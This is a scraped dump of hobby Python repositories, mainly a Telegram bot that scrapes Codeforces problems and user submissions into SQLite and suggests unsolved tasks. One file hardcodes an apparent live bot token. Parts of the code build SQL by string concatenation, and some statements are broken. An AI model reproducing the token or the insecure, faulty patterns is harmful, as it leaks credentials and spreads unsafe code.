+= \"\\nYou may combine tags and difficults e.x. write '\"'dp math AB'\"' to get task with these tags and difficults.\"\n bot.send_message(message.chat.id, s)\n set_state(message.chat.id, config.States.S_GET_TASK.value)\n\n\[email protected]_handler(func = lambda message: get_current_state(message.chat.id) == config.States.S_GET_TASK.value)\ndef get_task(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n if name == None:\n bot.send_message(message.chat.id, \"You should login before get tasks.\")\n else:\n bases.update.update_user(name[1], name[0], name[2])\n bot.send_message(message.chat.id, bases.problem.get_unsolved_problem(message.text, name[1]))\n set_state(message.chat.id, config.States.S_START.value)\n\n\[email protected]_handler(commands=['stats'])\ndef stats(message):\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from users where chat_id = ?\", (str(message.chat.id),))\n name = conn.fetchone()\n settings.close()\n if name != None:\n bases.update.update_user(name[1], name[0], name[2])\n bases.problem.create_text_stats(name[1])\n img = open(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\users\\\\\" + name[1] + \".png\", \"rb\")\n bot.send_photo(message.chat.id, img)\n img.close()\n if bases.problem.create_stats_picture(name[1]):\n bot.send_message(message.chat.id, \"Sorry, you haven't solved tasks.\")\n return 0\n img = open(os.path.abspath(os.path.dirname(__file__)) + \"\\\\bases\\\\users\\\\\" + name[1] + \".png\", \"rb\")\n bot.send_photo(message.chat.id, img)\n img.close()\n else:\n bot.send_message(message.chat.id, \"You should login before getting statistic.\")\n\n\[email protected]_handler(content_types=['text'])\ndef reply(message):\n bot.send_message(message.chat.id, \"Hmm...\")\n\n\nif __name__ == '__main__':\n bot.polling(none_stop = True)" }, { "alpha_fraction": 0.5541045069694519, "alphanum_fraction": 0.5630596876144409, "avg_line_length": 36.74647903442383, "blob_id": "b049cc951d09c399c27173c4ce8d3cd22be61c40", "content_id": "0df997f55693273cd79372706f8f02e1f0ea8f8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2680, "license_type": "no_license", "max_line_length": 129, "num_lines": 71, "path": "/bases/createcfbase.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\navailable_tags = {'math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\", \"geometry\", \"combinatorics\"}\n\ndef create_cf_base():\n url = 'http://codeforces.com/problemset/'\n r = requests.get(url)\n max_page = 0\n soup = BeautifulSoup(r.text, \"lxml\")\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\cf.db\")\n conn = base.cursor()\n conn.execute(\"create table problems (problem INTEGER, diff CHAR)\")\n for i in available_tags:\n conn.execute(\"create table ? (problems INTEGER, diff CHAR)\", (i,))\n\n for link in soup.find_all(attrs={\"class\" : \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[3]))\n\n a = 0\n b = 0\n f = False\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/problemset/' + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n old = ''\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5 and old != s[3] + s[4]:\n a = s[3]\n b = s[4]\n old = s[3] + s[4]\n if not f:\n f = True\n last_update = old\n conn.execute(\"insert into problems values (?, ?)\", (a, b))\n if len(s) == 4 and s[3] in available_tags:\n conn.execute(\"insert into ? values (?, ?)\", (s[3], a, b))\n\n base.commit()\n base.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"create table users (chat_id INTEGER, username STRING, last_update STRING, last_problem STRING, state INTEGER)\")\n conn.execute(\"create table last_update_problemset (problem STRING)\")\n conn.execute(\"insert into last_update_problemset values (?)\", (last_update, ))\n settings.commit()\n settings.close()\n\n\ndef create_theory_table(): #create EMPTY theory table\n theory = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = theory.cursor()\n for i in available_tags:\n conn.execute(\"create table \" + i + \" (link STRING)\")\n theory.commit()\n theory.close()\n\n\npath = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'cf.db')\nif not os.path.exists(path):\n create_cf_base()\n\npath = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'theory.db')\nif not os.path.exists(path):\n create_theory_table()\n" }, { "alpha_fraction": 0.508474588394165, "alphanum_fraction": 0.5423728823661804, "avg_line_length": 16.5, "blob_id": "0fef44d39eb35bed6465b5fc878aa17afab4f7a3", "content_id": "a7e3f1ca457443192677c053033a0e4679c1a103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/config.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\ntoken = '461438069:AAG9IElm7TwFhLmheTpPmwYKn2xOqPWrLBw'\nfrom enum import Enum\n\nclass States(Enum):\n S_START = 0\n S_LOGIN = 1\n S_GET_TASK = 2\n S_THEORY = 3\n S_THEORY_ADDING = 4\n\n\n" }, { "alpha_fraction": 0.5890411138534546, "alphanum_fraction": 0.6014225482940674, "avg_line_length": 36.19607925415039, "blob_id": "192d37686765bb4df1e2e17c7913bc801370ad1b", "content_id": "f99fb1728a174a6f8b97a98be771c91eb2201bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7896, "license_type": "no_license", "max_line_length": 148, "num_lines": 204, "path": "/bases/problem.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "#Ребята, не стоит вскрывать этот код.\n#Вы молодые, хакеры, вам все легко. Это не то.\n#Это не Stuxnet и даже не шпионские программы ЦРУ. Сюда лучше не лезть.\n#Серьезно, любой из вас будет жалеть. Лучше закройте компилятор и забудьте что там писалось.\n#Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп.\n#Остальные просто не найдут.\n\nimport sqlite3\nimport os\nimport random\nimport matplotlib.pyplot as plt\n\navailable_tags = ['math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\", \"geometry\", \"combinatorics\"]\navailable_diff = ['A', 'B', 'C', 'D', 'E', 'F']\ncolors = ['red', 'green', 'tan', 'blue', 'purple', 'orange']\n\ndef checking_request_tags(tag):\n list_of_current_tags = list()\n for i in available_tags:\n if i in tag:\n list_of_current_tags.append(i)\n\n if len(list_of_current_tags) == 0:\n return available_tags.copy()\n\n return list_of_current_tags\n\n\ndef find_intersection(tasks, tag, username):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM \" + tag)\n a = list()\n problem_and_diff = cursor2.fetchone()\n while problem_and_diff != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? AND NOT verdict = 'OK'\", (problem_and_diff[0], problem_and_diff[1]))\n problem_and_diff_and_ok = cursor.fetchone()\n if problem_and_diff_and_ok != None and problem_and_diff_and_ok in tasks:\n a.append(problem_and_diff_and_ok)\n problem_and_diff = cursor2.fetchone()\n conn.close()\n conn2.close()\n return a\n\n\ndef get_array_of_tasks(tags_array, tasks, username):\n for i in range(1, len(tags_array)):\n tasks = find_intersection(tasks, tags_array[i], username)\n return tasks\n\n\ndef checking_request_diff(tag):\n list_of_current_diff = list()\n for i in available_diff:\n if i in tag:\n list_of_current_diff.append(i)\n if len(list_of_current_diff) == 0:\n return available_diff.copy()\n return list_of_current_diff\n\n\ndef get_unsolved_problem(tag, username):\n tasks = list()\n list_of_current_tags = checking_request_tags(tag)\n list_of_current_diff = checking_request_diff(tag)\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM \" + list_of_current_tags[0])\n problem_and_diff = cursor2.fetchone()\n while problem_and_diff != None:\n if problem_and_diff[1] in list_of_current_diff:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? AND NOT verdict = 'OK'\", (problem_and_diff[0], problem_and_diff[1]))\n problem_and_diff_and_ok = cursor.fetchone()\n if problem_and_diff_and_ok != None:\n tasks.append(problem_and_diff_and_ok)\n problem_and_diff = cursor2.fetchone()\n conn.close()\n conn2.close()\n tasks = get_array_of_tasks(list_of_current_tags, tasks, username)\n random.seed()\n if len(tasks) > 0:\n ind1 = random.randint(0, len(tasks) - 1)\n s1 = str(tasks[ind1][0]) + '/' + tasks[ind1][1]\n tasks.pop(ind1)\n return 'http://codeforces.com/problemset/problem/' + s1\n else:\n return \"You have solved all tasks with this tag, nice!\"\n\ndef get_theory_from_tag(tag):\n if not tag in available_tags:\n return \"Incorrect tag.\"\n\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = base.cursor()\n conn.execute(\"select * from \" + tag)\n x = conn.fetchone()\n s = \"\"\n while x != None:\n s += str(x[0]) + '\\n'\n x = conn.fetchone()\n base.close()\n return s\n\nclass Pair():\n def __init__(self, first, second):\n self.first = first\n self.second = second\n\ndef count_stats(username):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n list_tags_stats = list()\n\n for i in available_tags:\n cursor2.execute(\"SELECT * FROM \" + str(i))\n x = cursor2.fetchone()\n count = 0\n while x != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ? AND verdict = 'OK'\", (x[0], x[1]))\n y = cursor.fetchone()\n if y != None:\n count += 1\n x = cursor2.fetchone()\n list_tags_stats.append(Pair(count, i))\n conn.close()\n conn2.close()\n return list_tags_stats\n\ndef create_stats_picture(username):\n data_for_plot = list()\n leg = list()\n list_tags_stats = count_stats(username)\n sum = 0\n for i in range(len(list_tags_stats)):\n sum += list_tags_stats[i].first\n for i in range(len(list_tags_stats)):\n if list_tags_stats[i].first / sum != 0:\n data_for_plot.append(list_tags_stats[i].first / sum)\n leg.append(list_tags_stats[i].second)\n\n fig1, ax1 = plt.subplots()\n ax1.pie(data_for_plot, autopct='%1.1f%%',\n shadow=True, startangle=90)\n ax1.axis('equal')\n ax1.legend(leg)\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\", username + '.png')\n if os.path.exists(path):\n os.remove(path)\n plt.savefig(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + \".png\")\n plt.close()\n return False\n\n\ndef count_stats_for_second_plot(username):\n verdict = {\"COMPILATION_ERROR\": 0, \"OK\": 0, \"TIME_LIMIT_EXCEEDED\": 0, \"WRONG_ANSWER\": 0, \"RUNTIME_ERROR\": 0,\n \"MEMORY_LIMIT_EXCEEDED\": 0}\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n count = 0\n for i in available_tags:\n cursor2.execute(\"SELECT * FROM \" + str(i))\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"SELECT * FROM result WHERE problem = ? AND diff = ?\", (x[0], x[1]))\n y = cursor.fetchone()\n if y != None:\n for j in verdict.keys():\n if y[2] == j:\n verdict[j] += 1\n count += 1\n\n x = cursor2.fetchone()\n return verdict\n conn.close()\n conn2.close()\n\n\ndef create_text_stats(username):\n list_tags_stats = list()\n data_for_plot = list()\n verdict = count_stats_for_second_plot(username)\n for i in verdict.keys():\n list_tags_stats.append(i)\n data_for_plot.append(verdict[i])\n fig1, ax1 = plt.subplots()\n ax1.pie(data_for_plot, labels = data_for_plot, colors = colors,\n shadow=True, startangle=90)\n ax1.axis('equal')\n ax1.legend(list_tags_stats)\n ax1.set_title('How many different verdict in last status of problem you have: ')\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\", username + '.png')\n if os.path.exists(path):\n os.remove(path)\n plt.savefig(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + \".png\")\n plt.close()\n return True\n\n\n\n\n" }, { "alpha_fraction": 0.5495448708534241, "alphanum_fraction": 0.5622887015342712, "avg_line_length": 42.21348190307617, "blob_id": "df29d72b00a9b09f5faa74ab0e8e7eb09957fcb7", "content_id": "8ed686d74b22b051a3aa87d54c3f7006b9162dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3845, "license_type": "no_license", "max_line_length": 125, "num_lines": 89, "path": "/bases/createuserbase.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef check_username(username):\n if username == \"\":\n return True\n if len(username.split()) > 1:\n return True\n r = requests.get('http://codeforces.com/submissions/' + username)\n soup = BeautifulSoup(r.text, \"lxml\")\n if soup.find(attrs={\"class\":\"verdict\"}) == None:\n return True\n return False\n\n\ndef clean_base(username):\n path = os.path.join(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n if os.path.exists(path):\n os.remove(path)\n\n\ndef init_user(username, chat_id):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor.execute(\"CREATE TABLE result (problem INTEGER, diff STRING, verdict STRING)\")\n cursor2.execute(\"SELECT * FROM problems\")\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"insert into result values (?, ?, ? )\", (x[0], x[1], \"NULL\"))\n x = cursor2.fetchone()\n\n url = 'http://codeforces.com/submissions/' + username\n r = requests.get(url)\n max_page = 1\n soup = BeautifulSoup(r.text, \"lxml\")\n\n for link in soup.find_all(attrs={\"class\": \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[4]))\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/0')\n soup = BeautifulSoup(r.text, \"lxml\")\n last_try = soup.find(attrs={\"class\":\"status-small\"})\n if not last_try == None:\n last_try = str(last_try).split()\n last_try = str(last_try[2]) + str(last_try[3])\n\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n count = 0\n ver = soup.find_all(attrs={\"class\": \"submissionVerdictWrapper\"})\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5:\n s2 = str(ver[count]).split()\n s2 = s2[5].split('\\\"')\n count += 1\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (s[3], s[4]))\n x = cursor.fetchone()\n if s2[1] == 'OK' and x != None:\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if x != None and x[2] != 'OK':\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n conn.commit()\n conn.close()\n conn2.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"select * from last_update_problemset\")\n last_problem = conn.fetchone()\n conn.execute(\"select * from users where chat_id = ?\", (str(chat_id),))\n x = conn.fetchone()\n if x == None:\n conn.execute(\"insert into users values (?, ?, ?, ?, ?)\", (chat_id, username, str(last_try), str(last_problem[0]), 1))\n else:\n conn.execute(\"update users set username = ? where chat_id = ?\", (str(username), str(chat_id)))\n conn.execute(\"update users set last_update = ? where chat_id = ?\", (str(last_try), str(chat_id)))\n conn.execute(\"update users set last_problem = ? where chat_id = ?\", (str(last_problem[0]), str(chat_id)))\n conn.execute(\"update users set state = ? where chat_id = ?\", (str(1), str(chat_id)))\n settings.commit()\n settings.close()" } ]
6
KhazanahAmericasInc/sensortower-dashboard
https://github.com/KhazanahAmericasInc/sensortower-dashboard
281b91334205f9e3d052bad7f0574726ec84647f
b692d35f7d2a0bd457812ca3e438ad9041a10c56
f354e77fac54bcd63eaec1cd568eb0c0beb7edb8
refs/heads/master
2020-04-20T02:15:57.560857
2019-02-07T03:10:31
2019-02-07T03:10:31
168,567,149
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6648044586181641, "alphanum_fraction": 0.6703910827636719, "avg_line_length": 26.55384635925293, "blob_id": "a10ccbc9f6cac50ac988adde122ddfd8eebcf5e8", "content_id": "7836e3c932c02f14d407f480025af3269cba754e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1790, "license_type": "no_license", "max_line_length": 107, "num_lines": 65, "path": "/main.py", "repo_name": "KhazanahAmericasInc/sensortower-dashboard", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask import render_template\nimport pyrebase\napp = Flask(__name__)\n\nconfig = {\n\t\"apiKey\": \"AIzaSyCUeQILRjIK7-3om5eyIWwFOYx4YPHOvaY\",\n \"authDomain\": \"sensortower-dashboard.firebaseapp.com\",\n \"databaseURL\": \"https://sensortower-dashboard.firebaseio.com\",\n\t\"storageBucket\": \"sensortower-dashboard.appspot.com\",\n\t\"serviceAccount\": \"./auth/sensortower-dashboard-firebase-adminsdk-xuy2n-65d15773de.json\" \n}\nfirebase = pyrebase.initialize_app(config)\n\n# auth = firebase.auth()\n# user = auth.sign_in_with_email_and_password(\"[email protected]\", \"kai-2019\")\n\ndb=firebase.database()\n\[email protected]('/')\ndef hello():\n\tvehicle_data = get_all_data()\n\tvehicle_data_arr = get_all_data_arrs()\n\treturn render_template(\"dashboard.html\", vehicle_data = vehicle_data, vehicle_data_arr = vehicle_data_arr)\n\n# def push_data(latitude, longitude):\n# \tnew_car = {\"name\": \"Car1\", \"location\": {\"latitude\":latitude,\"longitude\":longitude}}\n# \tdata={\"name\":\"test\"}\n# \tdb.child(\"cars-spotted\").push(new_car)\n# \tusers = db.child('cars-spotted').get()\n# \tprint(users.val())\n# \t# db.child(\"users\").push()\n\n# @app.route('/get_data', methods=[\"GET\", \"POST\"])\ndef get_all_data():\n\tvehicles = db.child('vehicles').get()\n\tvehicles_array = []\n\tfor vehicle in vehicles.each():\n\t\tvehicles_array.append(vehicle.val())\n\t# print(vehicles_array)\n\t# print(vehicles_array[0])\n\t# print(len(vehicles_array))\n\treturn vehicles_array\n\ndef get_all_data_arrs():\n\tvehicles = db.child('vehicles').get()\n\tvehicles_array = []\n\tfor vehicle in vehicles.each():\n\t\tv_obj = vehicle.val()\n\t\tv_arr = []\n\t\tfor k, v in v_obj.items():\n\t\t\tif(k!=\"img_data\"):\n\t\t\t\tv_arr.append(v)\n\t\t\telse:\n\t\t\t\tfor k_i,v_i in v.items():\n\t\t\t\t\tv_arr.append(v_i)\n\t\tvehicles_array.append(v_arr)\n\n\treturn vehicles_array\n\n# get_all_data_arrs()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)" }, { "alpha_fraction": 0.7773972749710083, "alphanum_fraction": 0.789383590221405, "avg_line_length": 17.80645179748535, "blob_id": "267344d218439744998868fe747c32900728c25c", "content_id": "b798861f893b880430d42ddeeffb355615715b6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 584, "license_type": "no_license", "max_line_length": 81, "num_lines": 31, "path": "/README.md", "repo_name": "KhazanahAmericasInc/sensortower-dashboard", "src_encoding": "UTF-8", "text": "Displays the information on the sensortower in a web app.\n\nSetup instuctions:\n\n1.) Outside of the folder install virtualenv using:\n\npip3 install virtualenv\n\nThen create a virtual environment with:\n\nvirtualenv venv\n\n2.) Activate the virtual environment with:\n\nsource venv/bin/activate\n\n3.) Go into the folder and install the dependencies specified by requirements.txt\n\npip3 install -r requirements.txt\n\n4.) Run the application by running main.py with\n\n python3 main.py\n\nAlternatively, tell FLASK the entry point for your app:\n\nset FLASK_APP=main\n\nset FLASK_ENV=development\n\nflask run \n" } ]
2
ArvinZhang/py-workspace
https://github.com/ArvinZhang/py-workspace
a45c42f7fd8b81d9b7d5a1a5a457a2074a66d9f4
043ddb19946bcfdbcf7185f03c01cd9823a4ea66
d23d00153e637406cd280a86396362e933e6f721
refs/heads/master
2020-04-05T08:05:53.807879
2018-11-08T12:07:41
2018-11-08T12:07:41
156,700,946
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49625083804130554, "alphanum_fraction": 0.5293115377426147, "avg_line_length": 18.691274642944336, "blob_id": "586d86af39d85d1db6a4e437b9bacffcdf151db5", "content_id": "96b05c230f5bdc62fd93cba88974af7b9bb79881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2964, "license_type": "no_license", "max_line_length": 68, "num_lines": 149, "path": "/App1/BasicMethod.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport time\nimport calendar\nimport datetime\nimport ConnectionDB\nimport LamdaFun\nfrom component import Script1\nfrom component import Script2\n\n# foreach operation\ndef styForeach(list2):\n for name in list2:\n # name += \" String append\"\n if name.endswith(\"append\"):\n print \"true\"\n continue\n else:\n print \"false\"\n print name\n\n\n# python 操作list集合练习\ndef styList():\n # list\n list = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"];\n\n list1 = [\"a\", \"b\", \"c\", \"d\"];\n\n list2 = [\"Arvin\", \"tester1\", \"tester2\", \"other\"];\n\n # 输出指定的idex\n print 'println list ', list[1]\n\n # 输出index范围\n print 'println list ', list[1:5]\n\n print 'println list index 5 ', list[5]\n\n # update\n list2[0] = 'Zhang'\n\n print list2\n # remove\n del list2[3]\n # append\n list2.append(\"append list\")\n\n print \"my name is \", list2[0]\n return list2\n\n\n# tuple\ndef styTuple():\n tup1 = (\"Arvin\", \"Zhang\", \"Wu\", \"Xie\", \"Yuan\")\n tup2 = (1, 2, 3, 4, 5, 6, 7, 8)\n print \"tup1e length\", len(tup1)\n\n # 'tuple' object does not support item assignment\n # tup1[0]=\"chang\"\n\n for var in tup1:\n print var\n print tup1[1:]\n print tup1[-2]\n print \"max value\", max(tup2)\n print \"min value\", min(tup2)\n del tup1\n print \"after delete tuple\"\n # print tup1\n\n\ndef styDict():\n dict1 = {\"name\": \"wu\", \"age\": 18, \"occupation\": \"programmer\"};\n print type(dict1)\n\n if dict1.has_key(\"age\"):\n print \"find keys age\"\n\n print dict1.values()\n\n # print dict1.pop(\"age\")\n\n # add\n dict1['income'] = \"1W\"\n for row in dict1:\n\n print None == dict1.get(\"genar\")\n\n print \"set default:\", dict1.setdefault(row)\n\n if dict1.setdefault(\"age\") == 18:\n print \"find age is 18\"\n\n if \"age\" == row and int == type(dict1[row]):\n # find and update\n dict1[row] = 28\n else:\n print \"can't not found age\"\n print \"type is\", type(dict1[row])\n print row + \":\" + bytes(dict1[row])\n\n # copy dict\n dict2 = dict1.copy();\n # clear\n dict2.clear()\n\n print len(dict2)\n\n\ndef styTime():\n ticks = time.time()\n print ticks\n localTime = time.localtime(time.time())\n\n print time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n\n print time.timezone\n cal=calendar.month(2018,11)\n\n print calendar.isleap(2020)\n print cal\n #datetime\n i=datetime.datetime.now();\n print i\n print i.year\n\ndef main():\n print \">>>>>>>>>>>>>>>>>>mian test start>>>>>>>>>>>>>>>>>>\"\n # var =styList()\n\n # styForeach(styList());\n\n # styTuple();\n\n #styDict();\n\n #styTime();\n\n #print LamdaFun.sum(1,2);\n\n #reload(LamdaFun)\n\n Script1.script1()\n\n Script2.script2()\n print \"<<<<<<<<<<<<<<<<<<mian test end<<<<<<<<<<<<<<<<<<\"\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5723951458930969, "alphanum_fraction": 0.575778067111969, "avg_line_length": 20.420289993286133, "blob_id": "a6475215692e9dee517b4455315e7262d1f8720b", "content_id": "36360e1ee6c52c37f7f5781fe280d3e37e6ac678", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 74, "num_lines": 69, "path": "/App1/styio/ReadFile.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: Utf-8 -*-\nimport os\n\n\ndef readfile():\n if os.path.exists(\"/Users/arvin.chang/Documents/gitfile.txt\"):\n print \"true\"\n else:\n print \"false\"\n\n if os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.R_OK):\n print \"Given file path is exist.\"\n\n try:\n file = open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"r+\")\n # print file.name\n print file.closed\n print file.mode\n print file.softspace\n\n print file.read()\n\n print \"当前文件位置 : \", file.tell()\n\n # file.seek(0,2)\n\n except IOError:\n print(\"File is not accessible.\")\n file.close()\n\n\ndef wirteFile():\n if os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.W_OK):\n print \"Given file path is exist.\"\n\n try:\n file = open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"a+\")\n\n str1 = \"this is test content\\n\"\n\n file.write(str1)\n except IOError:\n print \"File is not accessible\"\n\n finally:\n\n file.close()\n\n\ndef createFolder():\n os.mkdir(\"newdir\")\n os.rmdir(\"newdir\")\n os.remove(\"test.sh\")\n\n\ndef styWith():\n if not os.access(\"/Users/arvin.chang/Documents/gitfile.txt\", os.W_OK):\n print \"Given file path is not exist.\"\n return\n\n with open(\"/Users/arvin.chang/Documents/gitfile.txt\", \"r+\") as f:\n print \"file content\", f.read();\n\n\nif __name__ == '__main__':\n # readfile()\n # wirteFile()\n # createFolder()\n styWith()\n" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.600000381469727, "blob_id": "4fb55f1890269fc78cb0ca743f85aa6e59fad1b0", "content_id": "00fcb6b3465d8a64a08c54a5a0d231045a7189b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/App1/LamdaFun.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "#-*-conding:UTF-8-*-\n\nsum=lambda arg1,arg2:arg1*arg2\n\n#print sum(10,21)" }, { "alpha_fraction": 0.5248227119445801, "alphanum_fraction": 0.5319148898124695, "avg_line_length": 10.833333015441895, "blob_id": "d64e35ab2e8ce1bf3e39baa41ba08fdf37256b4e", "content_id": "728fc30f1d6cd6980a07ed0d5790fe321296aa8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 141, "license_type": "no_license", "max_line_length": 30, "num_lines": 12, "path": "/App1/styio/MainTest.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport ReadInput\n\ndef main():\n print(\"main test process\")\n\n ReadInput\n\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6440678238868713, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 15.181818008422852, "blob_id": "ba22fc5268d0a8b1084d8cad77f394c4c88dd204", "content_id": "9022fe093d43f259c1181eef8213fe515dd403b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 30, "num_lines": 11, "path": "/App1/styio/ReadInput.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n\n# read str content\nstr=raw_input(\"pls input: \")\nprint \"raw input content:\",str\n\n\n#read el content\nstr1=input(\"pls input:\" )\n\nprint \"input content:\",str1" }, { "alpha_fraction": 0.5552569627761841, "alphanum_fraction": 0.5653342008590698, "avg_line_length": 26.831775665283203, "blob_id": "40154087d5836bb133a96befe47d376a7425911a", "content_id": "be50d2e00e4a5cb3248ca2eacfa2e5fe9708e86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 117, "num_lines": 107, "path": "/App1/QueryDB.py", "repo_name": "ArvinZhang/py-workspace", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport MySQLdb\nimport traceback\n\n# open connection\ndb = MySQLdb.connect(\"localhost\", \"py\", \"123456\", \"pydb\");\n# 用cursor()方法获取操作游标\ncursor = db.cursor();\n# 使用execute方法执行SQL语句\n# cursor.execute(\"SELECT VERSION()\");\n\n# 使用 fetchone() 方法获取一条数据库。\n# data = cursor.fetchone();\n\n# print \"Database version : %s \" % data;\n\n# cursor.execute(\"DROP TABLE IF EXISTS TEST_DB\");\n\n# 创建数据表SQL语句\nsql = \"\"\"CREATE TABLE TEST_DB (\n 